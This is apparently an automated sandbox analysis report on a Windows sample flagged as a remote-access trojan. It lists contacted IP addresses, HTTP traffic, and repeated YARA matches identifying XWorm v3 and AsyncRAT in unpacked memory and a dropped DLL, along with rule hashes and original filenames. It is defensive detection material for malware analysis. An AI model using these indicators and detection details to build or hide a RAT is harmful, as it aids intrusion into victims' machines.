            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.211
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: c.pki.goog
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3637415749.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49718 version: TLS 1.2

            System Summary

            barindex
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.3.csc.exe.586d4b0.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.3.csc.exe.586d4b0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.3.csc.exe.586d4b0.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.3.csc.exe.586d4b0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.3.csc.exe.586d4b0.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.3.csc.exe.586d4b0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.3.csc.exe.586d4b0.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.3.csc.exe.586d4b0.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000003.1194534109.0000000005866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000005.00000002.3635736536.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000003.1194620490.000000000586E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000003.1193844237.0000000005860000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000003.1193897780.0000000005865000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dll, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dll, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, LoadApiName.csLarge array initialization: Bytes: array initializer size 33280
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.raw.unpack, LoadApiName.csLarge array initialization: Bytes: array initializer size 33280
            Source: p5qmaywt.dll.1.dr, LoadApiName.csLarge array initialization: Bytes: array initializer size 33280
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, GetPool.csLong String: Length: 139112
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E5B2B85_2_02E5B2B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E5C0095_2_02E5C009
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E581D85_2_02E581D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E555105_2_02E55510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E5BA205_2_02E5BA20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E55DE05_2_02E55DE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E551C85_2_02E551C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E50BA05_2_02E50BA0
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamep5qmaywt.dll4 vs SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000000.1163071923.00000000001D9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameResVolk.exe0 vs SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamep5qmaywt.dll4 vs SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1203287208.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeBinary or memory string: OriginalFilenameResVolk.exe0 vs SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.3.csc.exe.586d4b0.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.3.csc.exe.586d4b0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.3.csc.exe.586d4b0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.3.csc.exe.586d4b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.3.csc.exe.586d4b0.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.3.csc.exe.586d4b0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.3.csc.exe.586d4b0.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.3.csc.exe.586d4b0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000003.1194534109.0000000005866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000005.00000002.3635736536.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000003.1194620490.000000000586E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000003.1193844237.0000000005860000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000003.1193897780.0000000005865000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dll, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dll, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
